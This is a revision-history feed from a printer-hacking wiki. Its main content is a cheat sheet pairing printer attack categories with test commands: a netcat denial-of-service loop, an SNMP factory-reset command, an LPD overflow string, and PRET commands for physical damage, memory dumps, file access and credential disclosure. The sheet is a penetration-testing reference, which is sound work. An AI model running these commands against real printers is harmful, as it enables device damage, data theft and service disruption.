http://hacking-printers.net/wiki/index.php?title=Printer_Security_Testing_Cheat_Sheet&feed=atom&action=history
Printer Security Testing Cheat Sheet - Revision history
2024-03-29T12:58:41Z
Revision history for this page on the wiki
MediaWiki 1.26.4
http://hacking-printers.net/wiki/index.php?title=Printer_Security_Testing_Cheat_Sheet&diff=637&oldid=prev
Admin at 17:48, 2 July 2017
2017-07-02T17:48:50Z
<p></p>
<table class='diff diff-contentalign-left'>
<col class='diff-marker' />
<col class='diff-content' />
<col class='diff-marker' />
<col class='diff-content' />
<tr style='vertical-align: top;' lang='en'>
<td colspan='2' style="background-color: white; color:black; text-align: center;">← Older revision</td>
<td colspan='2' style="background-color: white; color:black; text-align: center;">Revision as of 17:48, 2 July 2017</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l58" >Line 58:</td>
<td colspan="2" class="diff-lineno">Line 58:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>| rowspan="2" | [[File system access]]</div></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>| rowspan="2" | [[File system access]]</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>| [[PostScript|PS]]</div></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>| [[PostScript|PS]]</div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color:black; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>|| [[PRET]] commands: <code>ls</code>, <code>get</code>, <code>put</code>, …</div></td><td class='diff-marker'>+</td><td style="color:black; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>|| [[PRET]] commands: <ins class="diffchange diffchange-inline"><code>fuzz</code>, </ins><code>ls</code>, <code>get</code>, <code>put</code>, …</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>|-</div></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>|-</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>| [[PJL]]</div></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>| [[PJL]]</div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color:black; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>|| [[PRET]] commands: <code>ls</code>, <code>get</code>, <code>put</code>, …</div></td><td class='diff-marker'>+</td><td style="color:black; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>|| [[PRET]] commands: <ins class="diffchange diffchange-inline"><code>fuzz</code>, </ins><code>ls</code>, <code>get</code>, <code>put</code>, …</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>|-</div></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>|-</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>| rowspan="2" | [[Credential disclosure]]</div></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>| rowspan="2" | [[Credential disclosure]]</div></td></tr>
</table>
Admin
http://hacking-printers.net/wiki/index.php?title=Printer_Security_Testing_Cheat_Sheet&diff=285&oldid=prev
Admin at 17:27, 28 January 2017
2017-01-28T17:27:31Z
<p></p>
<table class='diff diff-contentalign-left'>
<col class='diff-marker' />
<col class='diff-content' />
<col class='diff-marker' />
<col class='diff-content' />
<tr style='vertical-align: top;' lang='en'>
<td colspan='2' style="background-color: white; color:black; text-align: center;">← Older revision</td>
<td colspan='2' style="background-color: white; color:black; text-align: center;">Revision as of 17:27, 28 January 2017</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l1" >Line 1:</td>
<td colspan="2" class="diff-lineno">Line 1:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>To systematically check for vulnerabilities in a printing device, first perform a generic network [http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html assessment] and check for printer-specifc web based information leaks using [[Praeda]]. Then, use the following cheat sheet to quickly find flaws in [[Fundamentals#Printer Control Languages|printer languages]] and [[Fundamentals#Network printing protocols|network protocols]].</div></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>To systematically check for vulnerabilities in a printing device, first perform a generic network [http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html assessment] and check for printer-specifc web based information leaks using [[Praeda]]. Then, use the following cheat sheet to quickly find flaws in [[Fundamentals#Printer Control Languages|printer languages]] and [[Fundamentals#Network printing protocols|network protocols]].</div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color:black; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del style="font-weight: bold; text-decoration: none;"></del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>{| class="wikitable"</div></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>{| class="wikitable"</div></td></tr>
</table>
Admin
http://hacking-printers.net/wiki/index.php?title=Printer_Security_Testing_Cheat_Sheet&diff=201&oldid=prev
Admin at 13:42, 23 January 2017
2017-01-23T13:42:57Z
<p></p>
<table class='diff diff-contentalign-left'>
<col class='diff-marker' />
<col class='diff-content' />
<col class='diff-marker' />
<col class='diff-content' />
<tr style='vertical-align: top;' lang='en'>
<td colspan='2' style="background-color: white; color:black; text-align: center;">← Older revision</td>
<td colspan='2' style="background-color: white; color:black; text-align: center;">Revision as of 13:42, 23 January 2017</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l1" >Line 1:</td>
<td colspan="2" class="diff-lineno">Line 1:</td></tr>
<tr><td colspan="2"> </td><td class='diff-marker'>+</td><td style="color:black; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">To systematically check for vulnerabilities in a printing device, first perform a generic network [http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html assessment] and check for printer-specifc web based information leaks using [[Praeda]]. Then, use the following cheat sheet to quickly find flaws in [[Fundamentals#Printer Control Languages|printer languages]] and [[Fundamentals#Network printing protocols|network protocols]].</ins></div></td></tr>
<tr><td colspan="2"> </td><td class='diff-marker'>+</td><td style="color:black; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;"></ins></div></td></tr>
<tr><td colspan="2"> </td><td class='diff-marker'>+</td><td style="color:black; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;"></ins></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>{| class="wikitable"</div></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>{| class="wikitable"</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>|-</div></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>|-</div></td></tr>
</table>
Admin
http://hacking-printers.net/wiki/index.php?title=Printer_Security_Testing_Cheat_Sheet&diff=200&oldid=prev
Admin: Created page with "{| class="wikitable" |- ! Category !! Attack !! Protocol !! Testing |- | rowspan="5" | Denial of service | Transmission channel || TCP || <code>while true; do nc pr..."
2017-01-23T13:33:14Z
<p>Created page with "{| class="wikitable" |- ! Category !! Attack !! Protocol !! Testing |- | rowspan="5" | <a href="/wiki/index.php/Denial_of_service" title="Denial of service">Denial of service</a> | <a href="/wiki/index.php/Transmission_channel" title="Transmission channel">Transmission channel</a> || TCP || <code>while true; do nc pr..."</p>
<p><b>New page</b></p><div>{| class="wikitable"<br />
|-<br />
! Category !! Attack !! Protocol !! Testing<br />
|-<br />
| rowspan="5" | [[Denial of service]]<br />
| [[Transmission channel]] || TCP || <code>while true; do nc printer 9100; done</code><br />
|-<br />
| rowspan="2" | [[Document processing]]<br />
| [[PostScript|PS]]<br />
|| [[PRET]] commands: <code>disable</code>, <code>hang</code><br />
|-<br />
| [[PJL]]<br />
|| [[PRET]] commands: <code>disable</code>, <code>offline</code><br />
|-<br />
| rowspan="2" | [[Physical damage]]<br />
| [[PostScript|PS]]<br />
|| [[PRET]] command: <code>destroy</code><br />
|-<br />
| [[PJL]]<br />
|| [[PRET]] command: <code>destroy</code><br />
|-<br />
| rowspan="8" | [[Privilege escalation]]<br />
| rowspan="3" | [[Factory defaults]]<br />
| [[SNMP]]<br />
|| <code>snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6</code><br />
|-<br />
| [[PML]]<br />
|| [[PRET]] command: <code>reset</code><br />
|-<br />
| [[PostScript|PS]]<br />
|| [[PRET]] command: <code>reset</code><br />
|-<br />
| rowspan="4" | [[Accounting bypass]]<br />
| TCP<br />
|| Connect to printer directly, bypassing the print server<br />
|-<br />
| [[IPP]]<br />
|| Check if you can set a username without authentication<br />
|-<br />
| [[PostScript|PS]]<br />
|| Check if PostScript code is preprocessed on print server<br />
|-<br />
| [[PJL]]<br />
|| [[PRET]] command: <code>pagecount</code><br />
|-<br />
| [[Fax and Scanner]] || multiple || Install printer driver and (ab)use fax/scan functionality<br />
|-<br />
| rowspan="2" | [[Print job access]]<br />
| [[Print job retention]] || [[PostScript|PS]] || [[PRET]] command: <code>capture</code><br />
|-<br />
| [[Print job manipulation]] || [[PostScript|PS]] || [[PRET]] commands: <code>cross</code>, <code>overlay</code>, <code>replace</code><br />
|-<br />
| rowspan="5" | [[Information disclosure]]<br />
| [[Memory access]] || [[PJL]] || [[PRET]] command: <code>nvram dump</code><br />
|-<br />
| rowspan="2" | [[File system access]]<br />
| [[PostScript|PS]]<br />
|| [[PRET]] commands: <code>ls</code>, <code>get</code>, <code>put</code>, …<br />
|-<br />
| [[PJL]]<br />
|| [[PRET]] commands: <code>ls</code>, <code>get</code>, <code>put</code>, …<br />
|-<br />
| rowspan="2" | [[Credential disclosure]]<br />
| [[PostScript|PS]]<br />
|| [[PRET]] commands: <code>lock</code>, <code>unlock</code><br />
|-<br />
| [[PJL]]<br />
|| [[PRET]] commands: <code>lock</code>, <code>unlock</code><br />
|-<br />
| rowspan="4" | [[Code execution]]<br />
| rowspan="2" | [[Buffer overflows]]<br />
| [[PJL]]<br />
|| [[PRET]] command: <code>flood</code><br />
|-<br />
| [[LPD]]<br />
|| <code>./lpdtest.py printer in "`python -c 'print "x"*3000'`"</code><br />
|-<br />
| [[Firmware updates]] || [[PJL]] || Flip a bit, check if the modified firmware is still accepted<br />
|-<br />
| [[Software packages]] || multiple || Obtain an SDK and write your own proof-of-concept application<br />
|-<br />
|}</div>
Admin